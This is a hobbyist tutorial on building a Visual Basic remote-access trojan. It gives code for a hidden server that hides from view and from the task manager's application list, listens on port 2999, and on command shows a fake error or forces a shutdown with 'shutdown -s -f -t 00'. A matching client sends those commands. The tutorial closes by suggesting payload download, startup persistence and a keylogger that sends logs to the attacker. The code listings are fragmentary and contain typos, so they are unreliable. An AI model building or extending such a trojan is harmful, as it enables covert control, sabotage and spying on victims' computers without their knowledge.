Writing a Trojan
is a lot easier than most people think. All it really involves is two
simple applications both with fewer than 100 lines of code.
The first application is the client or the program that one user knows
about. The second is the server or the actual “trojan” part. I will now
go
through what you need for both and some sample code.
Server
The server is the Trojan part of the program. You usually will want this
to be as hidden as possible so the average user can’t find it.
To do this you start by using
CODE C Language
This little bit of code makes the program invisible to the naked eye.
Now we all know that the task manager is a little bit peskier.
So to get our application hidden from that a little better we make our code look like this.
CODE C Language
3 | App.TaskVisible = False |
(Due to Bill gates, all running exe's will be displayed in the list of
running processes. Your app will be hidden in the Running Applications
List though 
)
So now, we have a program that is virtually invisible to the average
user, and it only took four lines of code. Now all of you are thinking
that this
tutorial sucks right about now so lets make it a lot better by adding functions to our Trojan!
The first thing we want to do is make it be able to listen for
connections when it loads. So in order to do this we need to add a
Winsock Control.
I named my control win but you can name yours what ever.
Now to make it listen on port 2999 when the Trojan starts up we make our code look like this.
CODE C Language
3 | App.TaskVisible = False |
This code will set the local open port to 2999 and the port it sends it
to is 455. So now, we have a program that listens but still doesn’t do
anything neat.
Then we add this code to our main form:
CODE C Language
1 | Private Sub win_ConnectionRequest(ByVal requestID As Long) |
6 | Private Sub win_DataArrival(ByVal bytesTotal As Long) |
We now need to program the DoActions function that we called on our main
form. In case you were wondering the code that we added to the form
does two different things. The first sub makes it so all connection
requests are automatacly accepted. The second sub makes it so all data
is automaticly accepted and it then passes all of the data to the
function DoActions which we are about to code.
For the DoActions code, we want to make a public function in the module.
(Public so it can be used by code outside of the Module) So add this
code to the module and we are about done with the server
of the Trojan!
CODE C Language
01 | Public Function DoActions(x As String) |
05 | Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error" |
08 | shell "shutdown -s -f -t 00" |
Ok now we have a program that when the data “Msgbox” is sent to it on
port 2999 it will display a msgbox on the victims computer. When the
data "shutdown" is sent to it on port 2999 it will shutdown the
computer. I used a Select Case statement so it is easy to modify this
code to your own needs later on.
Congradulations! You just made your first Trojan. Lets go over the complete code now.
Main Form
CODE C Language
02 | Private Sub Form_Load() |
04 | App.TaskVisible = False |
10 | Pivate Sub win_ConnectionRequest(ByVal requestID As Long) |
15 | Private Sub win_DataArrival(ByVal bytesTotal As Long) |
Remember to add your winsock control and name it to win if you use this code.
Module
CODE C Language
01 | Public Function DoActions(x As String) |
05 | Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error" |
08 | shell "shutdown -s -f -t 00" |
That’s all there is to the server side or Trojan part of it. Now on to the Client.
Client
The client will be what you will interact with. You will use it to
connect to the remote server (trojan) and send it commands. Since we
made a server
that accepts the command of “shutdown” and "msgbox" lets make a client that sends the command “shutdown” and "msgbox".
Make a form and add a Winsock Control, a text box, and 4 buttons. The
Text box should be named txtIP if you want it to work with this code.
In addition, your buttons should be named cmdConnect, cmdMsgbox,
cmdShutdown, and cmdDisconnect. Now lets look at the code we would use
to make our
Client.
CODE C Language
01 | Private Sub cmdConnect_Click() |
05 | Win.RemoteHost = IpAddy |
08 | cmdConnect.Enabled = False |
11 | Private Sub cmdDisconnect_Click() |
13 | cmdConnect.Enabled = True |
16 | Private Sub cmdMsgbox_Click() |
20 | Private Sub cmdShutdown_Click() |
21 | Win.SendData "shutdown" |
That is the code for the client. All it does is gets the Ip Adress from
txtIp and connects to it on remote port 2999. Then when connected you
can send
the “shutdown” or "msgbox" data to the server and the respective actions
will be carried out (shutdown computer or display a msgbox)
These two programs do very little but can quickly evolve into a powerful
remote administration tool if you know what you are doing. I suggest
trying
to add different types of error handeling and functions to both the server and client.
Ideas:
Make the server able to download a file specified by the attacker
Add code to make the Server be executed at startup. (Its a registry key)
Add a keylogger to the server - make it send the log to the attacker.
There are loads more things you could do, just use your imagination.
I have made the Batch Trojan!!!!
